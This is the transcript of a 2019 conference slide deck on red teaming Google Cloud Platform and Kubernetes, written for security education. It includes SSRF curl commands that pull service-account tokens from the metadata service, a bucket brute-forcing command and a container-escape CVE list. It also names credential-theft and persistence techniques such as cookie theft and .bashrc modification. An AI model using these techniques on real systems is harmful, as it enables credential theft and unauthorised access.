May the Cloud be with You: Red Teaming GCP (Google Cloud Platform)

May the Cloud be with You: Red Teaming GCP (Google Cloud Platform)

More research on Red Teaming GCP (Google Cloud Platform) & K8s presented at SaintCon on October 24th 2019.

Also see YouTube video: https://www.youtube.com/watch?v=gTFPn-Z7Cc4

Cloud services are frequently misconfigured due to their rapid adoption and engineers not fully understanding the security ramifications of different configurations, which can frequently enable red teams to gain, expand, and persist access within Google Cloud Platform (GCP) environments. In this talk we will dive into how GCP services are commonly breached (e.g. SSRF vulnerabilities, discovering insecure cloud storage), and then show how attackers are expanding access within Docker & Kubernetes (K8s) environments (e.g. CVEs, insecure daemons). Finally we will demonstrate some unique techniques for persisting access within GCP environments for prolonged periods of time!

18ad4afa3f7c77bd84c3300505468aa0?s=128

TweekFawkes

October 24, 2019
Tweet

Transcript

  1. Stage 2 Security Version 1.0 Copyright 2019 by Stage 2

    Security May the Cloud Be with You! Red Teaming GCP (Google Cloud Platform)
  2. Copyright 2019 by Stage 2 Security Stage 2 Security Agenda

    Bryce Kunz @TweekFawkes - Who Am I? - GCP Overview - Compute Engine - Storage - Kubernetes (K8s) - Persistence for GCP
  3. Copyright 2019 by Stage 2 Security Stage 2 Security Past

    WhoAmI Defense DHS SOC Offense NSA Red Team Adobe Digital Exp. (DX)
  4. Copyright 2019 by Stage 2 Security Stage 2 Security WhoAmI

    - The Present Services • Hack (Pentest) • Hunt (Splunk ES) • Teach (BlackHat)
  5. Copyright 2019 by Stage 2 Security Stage 2 Security WhoAmI

    - The Present
  6. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Cloud Overview Overview
  7. Copyright 2019 by Stage 2 Security Stage 2 Security Management

    UI Control Plane (APIs) Data Plane Management UI Cloud Admin
  8. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Management UI Web Management Console -> https://Console.Cloud.Google.com
  9. Copyright 2019 by Stage 2 Security Stage 2 Security Control

    Plane (APIs) Control Plane (APIs) Data Plane Management UI Cloud Admin Ext Cloud Automation - Terraform - Salt Cloud - Custom
  10. Copyright 2019 by Stage 2 Security Stage 2 Security Data

    Plane Control Plane (APIs) Data Plane Management UI Cloud Admin Ext Cloud Automation - Terraform - Salt Cloud - Custom USERS
  11. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Roles GCP Roles are a collection of permissions • GCP Roles are similar to AWS IAM Policies Permissions enable you to take certain actions: • e.g. Compute.Instances.Start
  12. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Roles Primitives Role Primitives: • Owner -> Billing & Access • Editor -> Changes & Updates • Viewer -> Read-Only Pre-Dates Cloud Identity & Access Management (IAM) service in GCP • Generally, overly permissive and/or too broad
  13. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Roles Predefined Role Predefined: • Granular access to specific GCP resources (IAM) ◦ roles/pubsub.subscriber Role Custom: • Project and/or Organization level roles w/ granular permissions
  14. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Cloud Identity & Access Management (IAM) Authorization for GCP Resources • Introduced in early 2016 “Member” is one of the following • user, group, domain, service account, or public Cloud IAM does NOT directly manage identities, hence these reference: • Individual google account, Google groups, G Suite / Cloud Identity Domain Every identity has a unique email address
  15. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Cloud IAM Policies Policies bind Members to Roles at a specific hierarchy levels: • Org • Folder • Project • Resource Who can do what to which thing?
  16. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Accounts Three General Types of Creds: • User Accounts • API Keys • Services Accounts
  17. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Cloud Identity Identity as a Service • Users • Groups Similar to AWS IAM service or Active Directory Supports MFA and Security Key Enforcement (e.g. Hardware Device) Google Cloud Directory Sync -> LDAP and Active Directory Sync
  18. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Cloud Resource Manager Manage & Secure organization’s projects Similar to AWS Organizations
  19. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Cloud Audit Logging (Stackdriver) Audit Logs -> Who, What, When, and Where Logs • Admin Activity -> 400 days of retention for free • Data Access -> 7 days of retention for free, 30 days of retention for $ NOTE: GCP Services, so does not log apps running on GCE Similar to AWS CloudTrail
  20. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Cloud KMS Encryption service (AES256) designed to protect secrets • Secrets out of code base and into the environment • Does not store secrets • Encrypts and/or Decrypts secrets stored elsewhere • Control access to keys for Encryption and/or Decryption Integrated with IAM for Authorization & Cloud Audit Logging • Key rotation and key versioning for decryption Similar to AWS KMS & Vault by HashiCorp
  21. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Service Account Service Accounts are accounts for applications • Similar to AWS IAM Roles Service Accounts can be assumed by an application (or user, if authorized) • Should use least privilege
  22. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    User Managed Keys Two Types of Keys: • user managed keys ◦ generate/download private keys ◦ (e.g. for AWS to access GCP) ◦ expire 10 years from creation • GCP managed keys Ref: https:/ /cloud.google.com/iam/docs/understanding-service-accounts
  23. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    GCP Managed Keys Two Types of Keys: • GCP managed keys ◦ GCP native secrets ◦ prefered for GCP services ◦ (e.g. GCF, GAE, GCE, GKE, etc…) ◦ automatically rotated ◦ used for a maximum of two weeks Ref: https:/ /cloud.google.com/iam/docs/understanding-service-accounts
  24. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    GCE New VM Instance Google Compute Engine (GCE) Default: • Identity and API Access • Firewall • Startup script (Optional) • Metadata (Optional) Defaults: • Block project-wide SSH keys (unchecked) • Disk Encryption (Google-managed key) ...
  25. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    GCE Identity and API Access Access scopes: • read-only access to Storage and Service Management, • write access to Stackdriver Logging and Monitoring, • read/write access to Service Control. ...
  26. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    GCE Startup Script GCE Startup Script: • runs under the root user ...
  27. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    GCE Metadata Access scopes: • read-only access to Storage and Service Management, • write access to Stackdriver Logging and Monitoring, • read/write access to Service Control. ...
  28. Copyright 2019 by Stage 2 Security Stage 2 Security Compute

    Engine Overview
  29. Copyright 2019 by Stage 2 Security Stage 2 Security Data

    Center Firewall Server Side Request Forgery (SSRF) ... Web App Database Monitoring 10.1.1.1 Images 10.1.1.2 Internet 1 GET /app?img=b.jpg 2 3 4
  30. Copyright 2019 by Stage 2 Security Stage 2 Security Server

    Side Request Forgery (SSRF) ... Web App Database Monitoring 10.1.1.1 Images Internet Data Center Firewall 1 GET /?img=http://10.1.1.1/... 2 3 4 0
  31. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Server Side Request Forgery (SSRF) ... Web App Database metadata.google.internal 169.254.169.254 Images Internet GCP Firewall 1 GET /?img=http://metadata/.. 2 3 4 0 Instance
  32. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Metadata Service ... Web App Database metadata.google.internal 169.254.169.254 Images Internet GCP Firewall 1 GET /?img=http://metadata/.. 2 3 4 0 Instance
  33. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Metadata Service ... Web App Database metadata.google.internal 169.254.169.254 Images Internet GCP Firewall 1 GET /?img=http://metadata/.. 2 3 4 0 Instance
  34. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Metadata Service HTTP Header ... Web App Database metadata.google.internal 169.254.169.254 Images Internet GCP Firewall 1 GET /?img=http://metadata/.. 2 3 4 0 Instance
  35. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Metadata Service HTTP Header ... Web App Database metadata.google.internal 169.254.169.254 Images Internet GCP Firewall 1 GET /?img=http://metadata/.. 2 3 4 0 Instance
  36. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    v1beta1 ? ... Web App Database metadata.google.internal 169.254.169.254 Images Internet GCP Firewall 1 GET /?img=http://metadata/.. 2 3 4 0 Instance
  37. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    v1beta1 ! ... Web App Database metadata.google.internal 169.254.169.254 Images Internet GCP Firewall 1 GET /?img=http://metadata/.. 2 3 4 0 Instance
  38. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    SSRF Demo Steps on macOS: • curl http://35.247.8.30/ ...
  39. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    SSRF Demo Steps on macOS: • curl http://34.73.197.205/ • View Source ◦ /extimage?p=http%3A...%2Fsalamander.jpg curl http://34.73.197.205/extimage?p=http://metadata.google.internal/compute Metadata/v1beta1/instance/service-accounts/default/token ...
  40. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    SSRF Demo Steps on macOS: • curl http://35.247.8.30/ • View Source ◦ /extimage?p=http%3A...%2Fsalamander.jpg ...
  41. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    SSRF Demo Steps on macOS: • curl http://34.73.197.205/ • View Source ◦ /extimage?p=http%3A...%2Fsalamander.jpg curl http://34.73.197.205/extimage?p=http://metadata.google.internal/compute Metadata/v1beta1/instance/service-accounts/default/token ...
  42. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    SSRF Demo Steps on macOS: • curl http://35.247.8.30/ • View Source ◦ /extimage?p=http%3A...%2Fsalamander.jpg curl http://35.247.8.30/extimage?p=http://metadata.google.internal/computeMet adata/v1beta1/instance/service-accounts/default/token ...
  43. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    SSRF Demo Steps on macOS: • curl http://35.247.8.30/ • View Source ◦ /extimage?p=http%3A...%2Fsalamander.jpg curl http://35.247.8.30/extimage?p=http://metadata.google.internal/computeMet adata/v1beta1/instance/service-accounts/default/token ...
  44. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Validate User Tokens https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ACCESS_T OKEN ...
  45. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Default Access ...
  46. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Management UI Web Management Console -> https://Console.Cloud.Google.com
  47. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Compute Engine Identity and API Access
  48. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Compute Engine Identity and API Access
  49. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Full Access ...
  50. Copyright 2019 by Stage 2 Security Stage 2 Security SSH

    Agents Overview
  51. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    GCE SSH SSH Access to VM: ...
  52. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    GCE SSH SSH Agents ...
  53. Copyright 2019 by Stage 2 Security Stage 2 Security Storage

    Overview
  54. Copyright 2019 by Stage 2 Security Stage 2 Security 2017:

    May-Oct 1. “Internal Accenture Data, Customer Information Exposed in Public Amazon S3 Bucket” 2. “Another Wide-Open Amazon S3 Bucket Exposes Verizon Customer Account Data” 3. “US voter info stored on wide-open cloud box, thanks to bungling Republican contractor” 4. “Researcher discovers classified Army intel app, data on open public AWS bucket” 5. “Millions of Time Warner Cable Customer Records Exposed in Third-Party Data Leak” 6. “Drone Manufacturer DJI Leaves SSL Key Exposed on Public Repository” 7. “Dow Jones becomes the latest organization to be affected by an AWS cloud data leakage due to misconfiguration and user error.” etc...
  55. Copyright 2019 by Stage 2 Security Stage 2 Security 2017:

    May-Oct 1. “Internal Accenture Data, Customer Information Exposed in Public Amazon S3 Bucket” 2. “Another Wide-Open Amazon S3 Bucket Exposes Verizon Customer Account Data” 3. “US voter info stored on wide-open cloud box, thanks to bungling Republican contractor” 4. “Researcher discovers classified Army intel app, data on open public AWS bucket” 5. “Millions of Time Warner Cable Customer Records Exposed in Third-Party Data Leak” 6. “Drone Manufacturer DJI Leaves SSL Key Exposed on Public Repository” 7. “Dow Jones becomes the latest organization to be affected by an AWS cloud data leakage due to misconfiguration and user error.” etc...
  56. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Storage Public Buckets... ...
  57. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Accessing Objects https://storage.googleapis.com/its_all_in_the_cloud/object001.jpg storage.googleapis.com -> GCP its_all_in_the_cloud -> Globally Unique Bucket Name object001.jpg -> Object Name ...
  58. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    Listable Buckets ...
  59. Copyright 2019 by Stage 2 Security Stage 2 Security GoBuster

    - Finding Buckets & Objects https://storage.googleapis.com/its_all_in_the_cloud/object001.jpg gobuster -m dir -u “https://storage.googleapis.com” -i -t 100 -e -s 200,204 -w quickdir.txt
  60. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    (K8s) Overview
  61. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    Overview: Master Node & API Overview: • VM / Instance running the following services: ◦ kube-apiserver, ◦ kube-controller-manager and ◦ kube-scheduler. Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Control Admin
  62. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    Overview: etcd Overview: • Holds state information for the cluster ◦ “Access to etcd is equivalent to root permission in the cluster so ideally only the API server should have access to it.” Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Control Admin
  63. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    Overview: kubectl Overview: • kubectl is a cli to admin the cluster Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Control Admin Cli kubectl
  64. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    Overview: Dashboard Overview: • Dashboard is a web-based UI for K8s clusters ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Control Admin Browser Dashboard
  65. Copyright 2019 by Stage 2 Security Stage 2 Security Telsa

    K8s hacked! Unsecure Admin Console... ...
  66. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    Overview: Worker Nodes Overview: • Nodes are VMs / Instances w/ ◦ Container Runtime (e.g. Docker) ◦ Kube-proxy ◦ Kubelet ▪ Port: 10250/TCP ▪ Port: 10255/TCP ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control Admin
  67. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    Overview: Pods Overview: • Pod contains 1 or more containers ◦ Smallest unit in K8s ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control Admin
  68. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    Overview: Services Overview: • Services map K8s names to pod IPs ◦ When nodes get stop/started ◦ Services continue to route • Similar to a load balancer/proxy ◦ endpoint lookup... ◦ more magic be here ◦ ref: kube-proxy, etc... ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control Admin
  69. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    Overview: Load Balancers Overview: • Load Balancing via GCP Services ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control Admin
  70. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    SSRF Demo Steps on macOS: • curl http://34.73.197.205/ • View Source ◦ /extimage?p=http%3A...%2Fsalamander.jpg curl http://34.73.197.205/extimage?p=http://metadata.google.internal/compute Metadata/v1beta1/instance/service-accounts/default/token ...
  71. Copyright 2019 by Stage 2 Security Stage 2 Security GCP:

    SSRF Demo ... .sh
  72. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    Overview Overview: • Pod contains 1 or more containers ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  73. Copyright 2019 by Stage 2 Security Stage 2 Security Voodoo:

    /bin/cat /proc/1/cgroup ...
  74. Copyright 2019 by Stage 2 Security Stage 2 Security Voodoo:

    ls / ...
  75. Copyright 2019 by Stage 2 Security Stage 2 Security Voodoo:

    pid 1 is not init or launchd ...
  76. Copyright 2019 by Stage 2 Security Stage 2 Security Default

    Service Account Find secrets: • /var/run/secrets/kuberenetes.io/serviceaccount/token ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  77. Copyright 2019 by Stage 2 Security Stage 2 Security Voodoo:

    Python via Memory Only Container Escape Vulnerabilities: • CVE-2019-5736 -> Runc ...
  78. Copyright 2019 by Stage 2 Security Stage 2 Security Voodoo:

    Python via Memory Only Overview: • Pod contains 1 or more containers ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  79. Copyright 2019 by Stage 2 Security Stage 2 Security Voodoo:

    pyscript Container Escape Vulnerabilities: • CVE-2019-5736 -> Runc ...
  80. Copyright 2019 by Stage 2 Security Stage 2 Security Container

    Escapes Container Escape Vulnerabilities: • CVE-2019-5736 -> Runc ...
  81. Copyright 2019 by Stage 2 Security Stage 2 Security Voodoo:

    pyscript to access_token via metadata Overview: • Pod contains 1 or more containers ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl metadata.google.internal 169.254.169.254
  82. Copyright 2019 by Stage 2 Security Stage 2 Security Voodoo:

    pyscript to access_token via metadata Container Escape Vulnerabilities: • CVE-2019-5736 -> Runc ...
  83. Copyright 2019 by Stage 2 Security Stage 2 Security .../v1beta1/instance/attributes/kube-env

    • Masquerading as the Kubelet • To the K8s API ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl metadata.google.internal 169.254.169.254
  84. Copyright 2019 by Stage 2 Security Stage 2 Security Kubelet

    certificate and the Kubelet private key • Masquerading as the Kubelet • To the K8s API ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl metadata.google.internal 169.254.169.254
  85. Copyright 2019 by Stage 2 Security Stage 2 Security Kubelet

    -> Port: 10250/TCP, 10255/TCP Container Escape Vulnerabilities: • CVE-2019-5736 -> Runc ...
  86. Copyright 2019 by Stage 2 Security Stage 2 Security Kubelet

    -> Port: 10250/TCP, 10255/TCP Overview: • Pod contains 1 or more containers ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  87. Copyright 2019 by Stage 2 Security Stage 2 Security Kubelet

    -> Port: 10250/TCP, 10255/TCP Container Escape Vulnerabilities: • CVE-2019-5736 -> Runc ...
  88. Copyright 2019 by Stage 2 Security Stage 2 Security Kubelet

    -> Port: 10250/TCP, 10255/TCP ...
  89. Copyright 2019 by Stage 2 Security Stage 2 Security Container

    Escapes Container Escape Vulnerabilities: • CVE-2019-5736 -> Runc • CVE-2016-5195 -> Dirty Cow ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  90. Copyright 2019 by Stage 2 Security Stage 2 Security Container

    Escapes Container Escape Techniques: • Run Container in Cluster ◦ With Root File System Mounted! ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  91. Copyright 2019 by Stage 2 Security Stage 2 Security Kubernetes

    API Kubernetes API Vulnerabilities: • CVE-2018-1002105 -> kubernetes: authentication/authorization bypass ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  92. Copyright 2019 by Stage 2 Security Stage 2 Security Docker:

    2375/TCP (no auth.), 2376/TCP (TLS) Lateral Movement: • EDB-ID: 42356 -> Unprotected TCP Socket ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  93. Copyright 2019 by Stage 2 Security Stage 2 Security K8s

    Defense Overview
  94. Copyright 2019 by Stage 2 Security Stage 2 Security Network

    Security Highly recommend… • Isovalent.com w/ Cilium ◦ To lockdown network traffic ◦ via namepsaces ▪ … alternatively istio ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  95. Copyright 2019 by Stage 2 Security Stage 2 Security Update

    Kubernetes Cluster • Updates Frequently • New Security Features Regularly Added • Defaults Get Stronger ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  96. Copyright 2019 by Stage 2 Security Stage 2 Security Kubelet

    -> Configure Authentication • Enable “NodeRestriction” • --anonymous-auth=false ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  97. Copyright 2019 by Stage 2 Security Stage 2 Security Persistence

    in GCP Overview
  98. Copyright 2019 by Stage 2 Security Stage 2 Security Client-Side

    Vectors: • Remote Mac Exploitation Via Custom URL Schemes Ref: https:/ /objective-see.com/blog/blog_0x38.html
  99. Copyright 2019 by Stage 2 Security Stage 2 Security CLI:

    gcloud ...
  100. Copyright 2019 by Stage 2 Security Stage 2 Security CLI:

    gcloud ...
  101. Copyright 2019 by Stage 2 Security Stage 2 Security CLI:

    gcloud ...
  102. Copyright 2019 by Stage 2 Security Stage 2 Security CLI:

    gcloud ...
  103. Copyright 2019 by Stage 2 Security Stage 2 Security CLI:

    gcloud ...
  104. Copyright 2019 by Stage 2 Security Stage 2 Security Browser

    Cookies Client-Side: • cookie_crimes -> https://github.com/defaultnamehere/cookie_crimes GCP Ref: https:/ /wunderwuzzi23.github.io/blog/passthecookie.html
  105. Copyright 2019 by Stage 2 Security Stage 2 Security Cloud

    Shell Client-Side: • cookie_crimes -> https://github.com/defaultnamehere/cookie_crimes GCP ...
  106. Copyright 2019 by Stage 2 Security Stage 2 Security Cloud

    Shell: .bashrc modification • ...
  107. Copyright 2019 by Stage 2 Security Stage 2 Security Cloud

    Shell -> .bashrc -> Voodoo • ...
  108. Copyright 2019 by Stage 2 Security Stage 2 Security Cloud

    Shell -> .bashrc -> Voodoo -> Private Key • ...
  109. Copyright 2019 by Stage 2 Security Stage 2 Security Persistence

    in K8s Overview
  110. Copyright 2019 by Stage 2 Security Stage 2 Security Default

    Service Account Find secrets: • /var/run/secrets/kuberenetes.io/serviceaccount/token ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) Workers Control kubectl
  111. Copyright 2019 by Stage 2 Security Stage 2 Security AuthN

    Authentication (AuthN) • Prove Your ID ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) AuthN - Bearer Tokens - Client Certs - OIDC AD, etc.. Control kubectl
  112. Copyright 2019 by Stage 2 Security Stage 2 Security AuthZ

    Authorization (AuthZ) • Is User Allowed... ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) AuthN Bearer Tokens Certs OIDC , AD, ... Control kubectl AuthZ Roles RoleBin dings
  113. Copyright 2019 by Stage 2 Security Stage 2 Security Admission

    Control Admission Control • Policy Enforcement ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) AuthN Bearer Tokens Certs OIDC , AD, ... Control kubectl AuthZ Roles RoleBin dings Admission Control Mutating Validating
  114. Copyright 2019 by Stage 2 Security Stage 2 Security External

    Admission Control • Policy Enforcement ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) AuthN Bearer Tokens Certs OIDC , AD, ... Control kubectl AuthZ Roles RoleBin dings Admission Control Mutating Validating External Admission Control via Webhooks
  115. Copyright 2019 by Stage 2 Security Stage 2 Security Mutating!

    Admission Control • Policy Enforcement ... Infrastructure Cloud (e.g. Instances) or On-Premises (e.g. VMs) AuthN Bearer Tokens Certs OIDC , AD, ... Control kubectl AuthZ Roles RoleBin dings Admission Control Mutating Validating External Admission Control via Webhooks
  116. Copyright 2019 by Stage 2 Security Stage 2 Security Trainings

    @ BlackHat & On-Site! Thank You! Bryce@Stage2Sec.com .sh @TweekFawkes